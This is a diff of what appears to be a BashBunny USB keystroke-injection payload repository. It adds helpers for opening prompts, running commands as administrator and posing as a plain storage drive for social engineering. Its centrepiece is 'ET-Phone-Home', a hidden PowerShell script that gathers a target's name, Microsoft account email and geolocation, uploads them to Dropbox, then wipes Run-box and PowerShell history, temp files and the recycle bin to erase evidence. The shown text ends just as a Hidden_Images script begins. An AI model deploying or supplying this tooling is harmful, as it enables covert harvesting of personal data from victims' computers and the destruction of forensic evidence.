|
||||
|
||||
case $2 in
|
||||
|
||||
# @desc Show or hide desktop icon
|
||||
# @usage OSX MISC DESKTOP_ICON $action
|
||||
# @arg <string> HIDE | void
|
||||
"DESKTOP_ICON")
|
||||
if [ $3 == "HIDE" ]; then
|
||||
Q STRING "defaults write com.apple.finder CreateDesktop -bool false && killall Finder"
|
||||
Q ENTER
|
||||
else
|
||||
Q STRING "defaults write com.apple.finder CreateDesktop -bool true && killall Finder"
|
||||
Q ENTER
|
||||
fi
|
||||
;;
|
||||
|
||||
# @desc Change wallpaper with the specified url image
|
||||
# @usage OSX MISC WALLPAPER_URL
|
||||
"WALLPAPER_URL")
|
||||
Q STRING "cd ~/Desktop"
|
||||
Q ENTER
|
||||
Q STRING "curl $3 > img.bb"
|
||||
Q ENTER
|
||||
Q STRING "sqlite3 ~/Library/Application\ Support/Dock/desktoppicture.db \"update data set value = '~/Desktop/img.bb'\" && killall Dock"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Say something in the way of bigben
|
||||
# @usage OSX MISC SAY <VOICE> <TEXT_TO_SAY>
|
||||
# @info Need a focused terminal
|
||||
"SAY")
|
||||
Q STRING "say -v $3 $4 && printf '\e[2A\e[K\e[0J'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
esac
|
||||
|
||||
;;
|
||||
|
||||
esac
|
||||
|
||||
}
|
||||
|
||||
export -f OSX
|
||||
126
payloads/extensions/prompt.sh
Normal file
126
payloads/extensions/prompt.sh
Normal file
@@ -0,0 +1,126 @@
|
||||
#!/bin/bash
|
||||
|
||||
################################################################################
|
||||
# Quickly get to a prompt on any platform with the BashBunny
|
||||
#
|
||||
# How this works?
|
||||
# 1) Once the library is included in your payload, launch terminal\powershell\run
|
||||
# with:
|
||||
# PROMPT [OS]
|
||||
# 2) OS options are:
|
||||
# "AUTO" : Default - Hak5 2124 cross platform code
|
||||
# "UNITY" : Launches Terminal in Unity
|
||||
# "UNITY_RUN" : Opens run prompt in Unity
|
||||
# "MAC" : Launches Terminal in OSX
|
||||
# "POWERSHELL" : Launches Powershell in Windows
|
||||
# "WINDOWS_RUN": Opens run prompt in Windows
|
||||
# 3) To close a prompt use:
|
||||
# CLOSE_PROMPT [OS]
|
||||
################################################################################
|
||||
|
||||
################################################################################
|
||||
# Start HID Prompt
|
||||
################################################################################
|
||||
|
||||
|
||||
function PROMPT() {
|
||||
if [ -z "$1" ]; then
|
||||
OS="AUTO"
|
||||
else
|
||||
OS=$1
|
||||
fi
|
||||
|
||||
#AUTO
|
||||
if [ "${OS}" = "AUTO" ]; then
|
||||
LED G B 100
|
||||
QUACK ALT F2
|
||||
QUACK DELAY 50
|
||||
QUACK GUI SPACE
|
||||
QUACK DELAY 50
|
||||
QUACK GUI r
|
||||
clear_active_input
|
||||
wait_enter_wait 200 1000
|
||||
fi
|
||||
|
||||
#UNITY
|
||||
if [ "${OS}" = "UNITY" ]; then
|
||||
LED R B 100
|
||||
QUACK GUI
|
||||
clear_active_input
|
||||
QUACK STRING terminal
|
||||
wait_enter_wait 200 1000
|
||||
fi
|
||||
|
||||
#UNITY_RUN
|
||||
if [ "${OS}" = "UNITY_RUN" ]; then
|
||||
LED R B 100
|
||||
QUACK ALT F2
|
||||
fi
|
||||
|
||||
#MAC
|
||||
if [ "${OS}" = "MAC" ]; then
|
||||
LED R B G 100
|
||||
QUACK GUI SPACE
|
||||
clear_active_input
|
||||
QUACK STRING terminal
|
||||
wait_enter_wait 200 1000
|
||||
fi
|
||||
|
||||
#POWERSHELL
|
||||
if [ "${OS}" = "POWERSHELL" ]; then
|
||||
LED B 100
|
||||
QUACK GUI
|
||||
QUACK DELAY 500
|
||||
QUACK powershell
|
||||
wait_enter_wait 200 1000
|
||||
fi
|
||||
|
||||
#WINDOWS_RUN
|
||||
if [ "${OS}" = "WINDOWS_RUN" ]; then
|
||||
LED B 100
|
||||
QUACK GUI r
|
||||
QUACK DELAY 500
|
||||
fi
|
||||
|
||||
LED 0
|
||||
|
||||
}
|
||||
|
||||
function CLOSE_PROMPT() {
|
||||
if [ -z "$1" ]; then
|
||||
QUACK ALT F4
|
||||
else
|
||||
if [ "$1" = "MAC" ]; then
|
||||
QUACK GUI w
|
||||
else
|
||||
QUACK ALT F4
|
||||
fi
|
||||
fi
|
||||
}
|
||||
|
||||
# HELPER FUNCTIONS
|
||||
function wait_enter_wait() {
|
||||
if [ -z "$1" ]; then
|
||||
BEFORE_WAIT=100
|
||||
else
|
||||
BEFORE_WAIT=$1
|
||||
fi
|
||||
if [ -z "$2" ]; then
|
||||
AFTER_WAIT=100
|
||||
else
|
||||
AFTER_WAIT=$2
|
||||
fi
|
||||
|
||||
QUACK DELAY ${BEFORE_WAIT}
|
||||
QUACK ENTER
|
||||
QUACK DELAY ${AFTER_WAIT}
|
||||
}
|
||||
|
||||
function clear_active_input() {
|
||||
QUACK DELAY 50
|
||||
QUACK BACKSPACE
|
||||
QUACK DELAY 100
|
||||
}
|
||||
|
||||
export -f PROMPT
|
||||
export -f CLOSE_PROMPT
|
||||
@@ -8,11 +8,11 @@
|
||||
# REQUIRETOOL impacket
|
||||
|
||||
function REQUIRETOOL() {
|
||||
[[ -z "$1" ]] && exit 1 # parameter must be set
|
||||
[[ -z "$1" ]] && exit 1 # parameter must be set
|
||||
|
||||
if [ ! -d /tools/$1/ ]; then
|
||||
LED FAIL
|
||||
exit 1
|
||||
fi
|
||||
if [ ! -d /tools/$1/ ]; then
|
||||
LED FAIL
|
||||
exit 1
|
||||
fi
|
||||
}
|
||||
export -f REQUIRETOOL
|
||||
|
||||
@@ -13,9 +13,9 @@
|
||||
function RUN() {
|
||||
local os=$1
|
||||
shift
|
||||
|
||||
|
||||
[[ -z "$os" || -z "$*" ]] && exit 1 # Both OS and Command parameter must be set
|
||||
|
||||
|
||||
case "$os" in
|
||||
WIN)
|
||||
QUACK GUI r
|
||||
@@ -23,6 +23,12 @@ function RUN() {
|
||||
QUACK STRING "$@"
|
||||
QUACK ENTER
|
||||
;;
|
||||
WIN_ADMIN)
|
||||
QUACK GUI r
|
||||
QUACK DELAY 500
|
||||
QUACK STRING "$@"
|
||||
QUACK CTRL-SHIFT ENTER
|
||||
;;
|
||||
OSX)
|
||||
QUACK GUI SPACE
|
||||
QUACK DELAY 500
|
||||
@@ -37,6 +43,13 @@ function RUN() {
|
||||
QUACK DELAY 500
|
||||
QUACK ENTER
|
||||
;;
|
||||
LINUX)
|
||||
QUACK ALT F2
|
||||
QUACK DELAY 500
|
||||
QUACK STRING "$@"
|
||||
QUACK DELAY 500
|
||||
QUACK ENTER
|
||||
;;
|
||||
*)
|
||||
# OS parameter must be one of the above
|
||||
exit 1
|
||||
|
||||
50
payloads/extensions/runpayload.sh
Executable file
50
payloads/extensions/runpayload.sh
Executable file
@@ -0,0 +1,50 @@
|
||||
#!/bin/bash
|
||||
|
||||
#Payload selector by Dragonkeeper
|
||||
# Allows selecting payloads by amount of switch changes
|
||||
#
|
||||
#Step1. put all your payloads into a folder
|
||||
#
|
||||
#Step2. in the switch folder make a payload.txt and define the payloads and the dir to use as variables. like so:
|
||||
#scriptfolder=" /root/udisk/payloads/payloads/ "
|
||||
#script1="payload1.txt"
|
||||
#script2="payload2.txt"
|
||||
#
|
||||
#Step3. now call the extension as with the payloads you would like to use
|
||||
#RUN_PAYLOAD $scriptfolder $script1 $script2 $script3 $script4
|
||||
#
|
||||
# LED will go red, to let you know its ready. It is currently about to execute the 1st given payload
|
||||
# the LED will blue, to let you decide if you want to run that payload. if yes do nothing, if no flick the switch.
|
||||
#
|
||||
# if you flicked the switch, the LED will flash green to indicate this, it will then flick to red and go blue, it is now on the 2nd given payload and awaiting decision.
|
||||
#
|
||||
# if you leave the switch alone while its blue, the LED will go solid green to indicate that the selection is locked in.
|
||||
# and the payload of the given number will run.
|
||||
#
|
||||
# This will let you add as many payloads as you desire.
|
||||
|
||||
function RUN_PAYLOAD() {
|
||||
payloadcount=$#
|
||||
payloadarray=("$@")
|
||||
PAYLOAD=1
|
||||
LED R
|
||||
sleep 3
|
||||
while [ $payloadcount -ge $PAYLOAD ]; do
|
||||
LED R
|
||||
GET SWITCH_POSITION
|
||||
TEST=$SWITCH_POSITION
|
||||
LED B
|
||||
sleep 2
|
||||
GET SWITCH_POSITION
|
||||
if [ $SWITCH_POSITION == $TEST ]; then
|
||||
LED G
|
||||
"${payloadarray[0]}""${payloadarray["$PAYLOAD"]}"
|
||||
return
|
||||
fi
|
||||
LED G FAST
|
||||
PAYLOAD=$((PAYLOAD+1))
|
||||
sleep 1
|
||||
done
|
||||
}
|
||||
|
||||
export -f RUN_PAYLOAD
|
||||
60
payloads/extensions/setkb.sh
Normal file → Executable file
60
payloads/extensions/setkb.sh
Normal file → Executable file
@@ -7,45 +7,45 @@
|
||||
# Examples:
|
||||
# SETKB START (set the keyboard layout to a US keyboard layout)
|
||||
# SETKB DONE (set the keyboard layout to the default keyboard determined by the OS language settings)
|
||||
# SETKB xx-XX (overwrite the keyboard layout to whatever keyboard layout you need, you will need the [lanugage].json file to run Ducky scripts)
|
||||
# SETKB xx-XX (overwrite the keyboard layout to whatever keyboard layout you need, you will need the [lanugage].json file to run Ducky scripts)
|
||||
|
||||
|
||||
function SETKB() {
|
||||
local state=$1
|
||||
shift
|
||||
|
||||
[[ -z "$state" ]] && exit 1 # state keyboard parameter must be given.
|
||||
|
||||
case "$state" in
|
||||
'START')
|
||||
QUACK GUI r
|
||||
QUACK DELAY 500
|
||||
QUACK STRING "powershell.exe Set-WinUserLanguageList -LanguageList en-US -force;"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1500
|
||||
local state=$1
|
||||
shift
|
||||
|
||||
;;
|
||||
'DONE')
|
||||
QUACK GUI r
|
||||
QUACK DELAY 500
|
||||
QUACK "STRING powershell.exe \$back2kb=(get-Culture | Select -ExpandProperty Name) ; Set-WinUserLanguageList -LanguageList \$back2kb -force; "
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1500
|
||||
[[ -z "$state" ]] && exit 1 # state keyboard parameter must be given.
|
||||
|
||||
;;
|
||||
|
||||
*)
|
||||
QUACK GUI r
|
||||
QUACK DELAY 500
|
||||
QUACK "STRING powershell.exe Set-WinUserLanguageList -LanguageList $state -force"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1500
|
||||
case "$state" in
|
||||
'START')
|
||||
QUACK GUI r
|
||||
QUACK DELAY 500
|
||||
QUACK STRING "powershell.exe Set-WinUserLanguageList -LanguageList en-US -force;"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1500
|
||||
|
||||
;;
|
||||
;;
|
||||
'DONE')
|
||||
QUACK GUI r
|
||||
QUACK DELAY 500
|
||||
QUACK "STRING powershell.exe \$sl=(Get-WinSystemLocale | Select -ExpandProperty Name) ; Set-WinUserLanguageList -LanguageList \$sl -force; "
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1500
|
||||
|
||||
;;
|
||||
|
||||
*)
|
||||
QUACK GUI r
|
||||
QUACK DELAY 500
|
||||
QUACK "STRING powershell.exe Set-WinUserLanguageList -LanguageList $state -force"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1500
|
||||
|
||||
;;
|
||||
|
||||
|
||||
|
||||
esac
|
||||
esac
|
||||
}
|
||||
|
||||
export -f SETKB
|
||||
|
||||
23
payloads/extensions/sewait.sh
Normal file
23
payloads/extensions/sewait.sh
Normal file
@@ -0,0 +1,23 @@
|
||||
#!/bin/bash
|
||||
|
||||
# Social engineering wait by GermanNoob
|
||||
#
|
||||
# This extension can be used if no hidden access to the victim computer is possible and you have to social engineer your way to the target
|
||||
# This script will mount as a standard drive and wait until the attacker starts the real payload by changing the switch position
|
||||
#
|
||||
# This is just a small extension to DarrenKitchen's WAIT
|
||||
|
||||
function SEWAIT() {
|
||||
LED SPECIAL
|
||||
ATTACKMODE STORAGE
|
||||
GET SWITCH_POSITION
|
||||
TEST=$SWITCH_POSITION
|
||||
LED SPECIAL2
|
||||
while true
|
||||
do GET SWITCH_POSITION
|
||||
if [ $SWITCH_POSITION != $TEST ]; then break; fi
|
||||
sleep 1
|
||||
done
|
||||
}
|
||||
|
||||
export -f SEWAIT
|
||||
54
payloads/extensions/wait.sh
Executable file
54
payloads/extensions/wait.sh
Executable file
@@ -0,0 +1,54 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# WAIT v1 by @Hak5Darren
|
||||
# Pauses payload until the switch position has changed
|
||||
# Usage: WAIT
|
||||
function WAIT() {
|
||||
GET SWITCH_POSITION
|
||||
TEST=$SWITCH_POSITION
|
||||
while true
|
||||
do GET SWITCH_POSITION
|
||||
if [ $SWITCH_POSITION != $TEST ]; then break; fi
|
||||
sleep 1
|
||||
done
|
||||
}
|
||||
export -f WAIT
|
||||
|
||||
|
||||
# WAIT_FOR_LOOT v1 by Korben
|
||||
# WAIT_FOR_LOOT <file_path> (optional)<refresh interval in seconds>
|
||||
#
|
||||
# Example: WAIT_FOR_LOOT /root/loot/captured_keys.txt
|
||||
# Will return once /root/loot/captured_keys.txt exists
|
||||
# OR IF FILE ALREADY EXISTS
|
||||
# Will return once the file line count has increased
|
||||
|
||||
function WAIT_FOR_LOOT() {
|
||||
# Check for refresh interval override
|
||||
if [ -z "${2}" ]; then
|
||||
REFRESH_INTERVAL=1
|
||||
else
|
||||
REFRESH_INTERVAL=$2
|
||||
fi
|
||||
|
||||
if [ -f "${1}" ]; then
|
||||
# If file already exists wait for it to change size
|
||||
start_count=$(cat $1|wc -l)
|
||||
while [ $(cat $1|wc -l) -eq $start_count ]; do
|
||||
sleep $REFRESH_INTERVAL
|
||||
done
|
||||
else
|
||||
# File doesn't exist, wait for it to be created
|
||||
while [ ! -f "${1}" ]; do
|
||||
sleep $REFRESH_INTERVAL
|
||||
done
|
||||
fi
|
||||
}
|
||||
export -f WAIT_FOR_LOOT
|
||||
|
||||
# WAIT_FOR_TARGET_IP v1 by Hak5Darren
|
||||
# Pauses payload until target receives IP address
|
||||
function WAIT_FOR_TARGET_IP() {
|
||||
until [ ! -z $(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq) ]; do sleep 1; done
|
||||
}
|
||||
export -f WAIT_FOR_TARGET_IP
|
||||
23
payloads/extensions/wait_for_notpresent.sh
Executable file
23
payloads/extensions/wait_for_notpresent.sh
Executable file
@@ -0,0 +1,23 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# WAIT_FOR_NOTPRESENT v1 by @Hak5Darren
|
||||
# Pauses payload execution until specified bluetooth identifier IS NOT present
|
||||
# Usage: WAIT_FOR_NOTPRESENT devicename
|
||||
|
||||
function WAIT_FOR_NOTPRESENT() {
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
sleep 1
|
||||
echo -n -e "AT+ROLE=2" > /dev/ttyS1
|
||||
echo -n -e "AT+RESET" > /dev/ttyS1
|
||||
while true; do
|
||||
timeout 5s cat /dev/ttyS1 > /tmp/bt_observation
|
||||
if grep -qao $1 /tmp/bt_observation; then
|
||||
echo "$1 found"
|
||||
else
|
||||
break
|
||||
fi
|
||||
done
|
||||
}
|
||||
|
||||
export -f WAIT_FOR_NOTPRESENT
|
||||
23
payloads/extensions/wait_for_present.sh
Executable file
23
payloads/extensions/wait_for_present.sh
Executable file
@@ -0,0 +1,23 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# WAIT_FOR_PRESENT v1 by @Hak5Darren
|
||||
# Pauses payload execution until specified bluetooth identifier IS present
|
||||
# Usage: WAIT_FOR_PRESENT devicename
|
||||
|
||||
function WAIT_FOR_PRESENT() {
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
sleep 1
|
||||
echo -n -e "AT+ROLE=2" > /dev/ttyS1
|
||||
echo -n -e "AT+RESET" > /dev/ttyS1
|
||||
while true; do
|
||||
timeout 5s cat /dev/ttyS1 > /tmp/bt_observation
|
||||
if grep -qao $1 /tmp/bt_observation; then
|
||||
break
|
||||
else
|
||||
echo "$1 not found"
|
||||
fi
|
||||
done
|
||||
}
|
||||
|
||||
export -f WAIT_FOR_PRESENT
|
||||
14
payloads/extensions/waiteject.sh
Executable file
14
payloads/extensions/waiteject.sh
Executable file
@@ -0,0 +1,14 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# WAITEJECT v1 by kamotswind (https://github.com/kamotswind)
|
||||
# Blocks the payload from continuing until the USB storage is ejected from the host
|
||||
# Usage: WAITEJECT
|
||||
|
||||
function WAITEJECT() {
|
||||
until [ ! -z "`dmesg | grep \"usb close backing file\"`" ]
|
||||
do
|
||||
sleep 1
|
||||
done
|
||||
}
|
||||
|
||||
export -f WAITEJECT
|
||||
@@ -0,0 +1,154 @@
|
||||
|
||||
############################################################################################################################################################
|
||||
# | ___ _ _ _ # ,d88b.d88b #
|
||||
# Title : ET-Phone-Home | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
|
||||
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
|
||||
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
|
||||
# Category : Incident-Response | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
|
||||
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
|
||||
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
|
||||
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
|
||||
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
|
||||
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
|
||||
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
|
||||
# # / \ / ~ \ #
|
||||
# github.com/I-Am-Jakoby # \ / \~ ~/ #
|
||||
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
|
||||
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
|
||||
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
|
||||
############################################################################################################################################################
|
||||
|
||||
<#
|
||||
.SYNOPSIS
|
||||
This script is meant to recover your device or as an advanced recon tactic to get sensitive info on your target
|
||||
|
||||
.DESCRIPTION
|
||||
This program is used to locate your stolen cable. Or perhaps locate your "stolen" cable if you left it as bait.
|
||||
This script will get the Name and email associated with the targets microsoft account
|
||||
Their geo-location will also be grabbed giving you the latitude and longitude of where your device was activated
|
||||
#>
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_Device-Location.txt"
|
||||
|
||||
# Your dropbox access token to exfiltrate information to
|
||||
|
||||
$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN"
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
function Get-fullName {
|
||||
|
||||
try {
|
||||
|
||||
$fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
|
||||
|
||||
}
|
||||
|
||||
# If no name is detected function will return $env:UserName
|
||||
|
||||
# Write Error is just for troubleshooting
|
||||
catch {Write-Error "No name was detected"
|
||||
return $env:UserName
|
||||
-ErrorAction SilentlyContinue
|
||||
}
|
||||
|
||||
return $fullName
|
||||
|
||||
}
|
||||
|
||||
$FN = Get-fullName
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
function Get-email {
|
||||
|
||||
try {
|
||||
|
||||
$email = GPRESULT -Z /USER $Env:username | Select-String -Pattern "([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})" -AllMatches;$email = ("$email").Trim()
|
||||
return $email
|
||||
}
|
||||
|
||||
# If no email is detected function will return backup message for sapi speak
|
||||
|
||||
# Write Error is just for troubleshooting
|
||||
catch {Write-Error "An email was not found"
|
||||
return "No Email Detected"
|
||||
-ErrorAction SilentlyContinue
|
||||
}
|
||||
}
|
||||
|
||||
$EM = Get-email
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
function Get-GeoLocation{
|
||||
try {
|
||||
Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
|
||||
$GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
|
||||
$GeoWatcher.Start() #Begin resolving current locaton
|
||||
|
||||
while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
|
||||
Start-Sleep -Milliseconds 100 #Wait for discovery.
|
||||
}
|
||||
|
||||
if ($GeoWatcher.Permission -eq 'Denied'){
|
||||
Write-Error 'Access Denied for Location Information'
|
||||
} else {
|
||||
$GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results.
|
||||
}
|
||||
}
|
||||
# Write Error is just for troubleshooting
|
||||
catch {Write-Error "No coordinates found"
|
||||
return "No Coordinates found"
|
||||
-ErrorAction SilentlyContinue
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
$GL = Get-GeoLocation
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
echo $FN >> $env:TMP\$FileName
|
||||
echo $EM >> $env:TMP\$FileName
|
||||
echo $GL >> $env:TMP\$FileName
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
# Upload output file to dropbox
|
||||
|
||||
$TargetFilePath="/$FileName"
|
||||
$SourceFilePath="$env:TMP\$FileName"
|
||||
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
|
||||
$authorization = "Bearer " + $DropBoxAccessToken
|
||||
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
|
||||
$headers.Add("Authorization", $authorization)
|
||||
$headers.Add("Dropbox-API-Arg", $arg)
|
||||
$headers.Add("Content-Type", 'application/octet-stream')
|
||||
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This is to clean up behind you and remove any evidence to prove you were there
|
||||
#>
|
||||
|
||||
# Delete contents of Temp folder
|
||||
|
||||
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
|
||||
|
||||
# Delete run box history
|
||||
|
||||
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
|
||||
|
||||
# Delete powershell history
|
||||
|
||||
Remove-Item (Get-PSreadlineOption).HistorySavePath
|
||||
|
||||
# Deletes contents of recycle bin
|
||||
|
||||
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
|
||||
117
payloads/library/Incident_Response/-BB-ET-Phone-Home/README.md
Normal file
117
payloads/library/Incident_Response/-BB-ET-Phone-Home/README.md
Normal file
@@ -0,0 +1,117 @@
|
||||

|
||||
|
||||
<!-- TABLE OF CONTENTS -->
|
||||
<details>
|
||||
<summary>Table of Contents</summary>
|
||||
<ol>
|
||||
<li><a href="#Description">Description</a></li>
|
||||
<li><a href="#getting-started">Getting Started</a></li>
|
||||
<li><a href="#Contributing">Contributing</a></li>
|
||||
<li><a href="#Version-History">Version History</a></li>
|
||||
<li><a href="#Contact">Contact</a></li>
|
||||
<li><a href="#Acknowledgments">Acknowledgments</a></li>
|
||||
</ol>
|
||||
</details>
|
||||
|
||||
# ET Phone Home
|
||||
|
||||
A script I put together to locate your stolen devices, or your "stolen" baited devices
|
||||
|
||||
## Description
|
||||
|
||||
This program is meant to locate your devices. When someone plugs it into their computer
|
||||
Using a one liner in the run box a script will be downloaded and executed that grabs the Name and email of the associated microsoft account and the
|
||||
latitude and longitude of where the device was activated. This information is stored in a text document that is then uploaded to your dropbox.
|
||||
Finally the end of the script will delete the runbox and powershell history and delete the files in the TMP Folder and Recycle Bin.
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* DropBox - Your Shared link for the intended file
|
||||
* Windows 7,10,11
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
### Executing program
|
||||
|
||||
* Your device is plugged into the targets computer
|
||||
* A one liner command in the run box will execute the script on the bash bunny
|
||||
Something Like What you see below will be in your loot folder:
|
||||
|
||||
NAME
|
||||
|
||||
EMAIL
|
||||
|
||||
LATITUDE AND LONGITUDE
|
||||
|
||||
```
|
||||
Jakoby
|
||||
|
||||
jakoby@example.com
|
||||
|
||||
Latitude Longitude
|
||||
-------- ---------
|
||||
37.778919 -122.416313
|
||||
```
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Contributing
|
||||
|
||||
All contributors names will be listed here
|
||||
|
||||
I am Jakoby
|
||||
|
||||
Kalani
|
||||
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Version History
|
||||
|
||||
* 0.1
|
||||
* Initial Release
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- CONTACT -->
|
||||
## Contact
|
||||
|
||||
<div><h2>I am Jakoby</h2></div>
|
||||
<p><br/>
|
||||
|
||||
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
|
||||
|
||||
<a href="https://github.com/I-Am-Jakoby/">
|
||||
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.instagram.com/i_am_jakoby/">
|
||||
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
|
||||
</a>
|
||||
|
||||
<a href="https://twitter.com/I_Am_Jakoby/">
|
||||
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.youtube.com/c/IamJakoby/">
|
||||
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
|
||||
</a>
|
||||
|
||||
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-ET-Phone-Home)
|
||||
</p>
|
||||
|
||||
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- ACKNOWLEDGMENTS -->
|
||||
## Acknowledgments
|
||||
|
||||
* [Hak5](https://hak5.org/)
|
||||
* [MG](https://github.com/OMG-MG)
|
||||
|
||||
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
@@ -0,0 +1,22 @@
|
||||
# Title: ET-Phone-Home
|
||||
# Description: this script will download and execute your locator script to find your device when it is plugged in
|
||||
# Author: I am Jakoby
|
||||
# Version: 1.0
|
||||
# Category: Incident_Response
|
||||
# Attackmodes: HID, Storage
|
||||
# Target: Windows 10, 11
|
||||
|
||||
LED SETUP
|
||||
|
||||
GET SWITCH_POSITION
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
LED STAGE1
|
||||
|
||||
QUACK DELAY 3000
|
||||
QUACK GUI r
|
||||
QUACK DELAY 100
|
||||
LED STAGE2
|
||||
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\ET-Phone-Home.ps1')"
|
||||
QUACK ENTER
|
||||
@@ -0,0 +1,7 @@
|
||||
LED SETUP
|
||||
GET SWITCH_POSITION
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
LED SETUP
|
||||
RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\run.ps1')"
|
||||
LED ATTACK
|
||||
37
payloads/library/Incident_Response/Hidden_Images/readme.md
Normal file
37
payloads/library/Incident_Response/Hidden_Images/readme.md
Normal file
@@ -0,0 +1,37 @@
|
||||
|
||||
Author : Paul Murton
|
||||
|
||||
Notes :
|
||||
|
||||
My background is in Computer Forensics and Incident Response.
|
||||
I am new to Powershell, so it's likely that the script is inefficient,
|
||||
but it does work.
|
||||
|
||||
A (naive) user may attempt to hide image(picture) files by simply
|
||||
renaming them to appear to be other filetypes (i.e. Word documents etc).
|
||||
This payload uses a powershell script to walk the userprofile to look
|
||||
for image files that have been hidden in this manner.
|
||||
|
||||
It ignores files with image extensions, and checks the file headers
|
||||
for known image file headers.
|
||||
|
||||
The output is put into a CSV file in the folder \loot\image-files
|
||||
|
||||
The script can be easily modified to search for other filetypes (maybe
|
||||
mpg movie files etc)
|
||||
|
||||
It should be noted that payload is NOT forensically sound, and if
|
||||
"proper" forensic tools are available, they should be used.
|
||||
|
||||
Tested on ver 1.3
|
||||
|
||||
## STATUS
|
||||
|
||||
| LED | Status |
|
||||
| ---------------- | ------------------------------------- |
|
||||
| Purple (blinking)| Attack in progress |
|
||||
| Green (blinking) | Attack Finished |
|
||||
|
||||
|
||||
|
||||
|
||||
80
payloads/library/Incident_Response/Hidden_Images/run.ps1
Normal file
80
payloads/library/Incident_Response/Hidden_Images/run.ps1
Normal file
@@ -0,0 +1,80 @@
|
||||
|
||||
#Get the path and file name that you are using for output
|
||||
# find connected bashbunny drive:
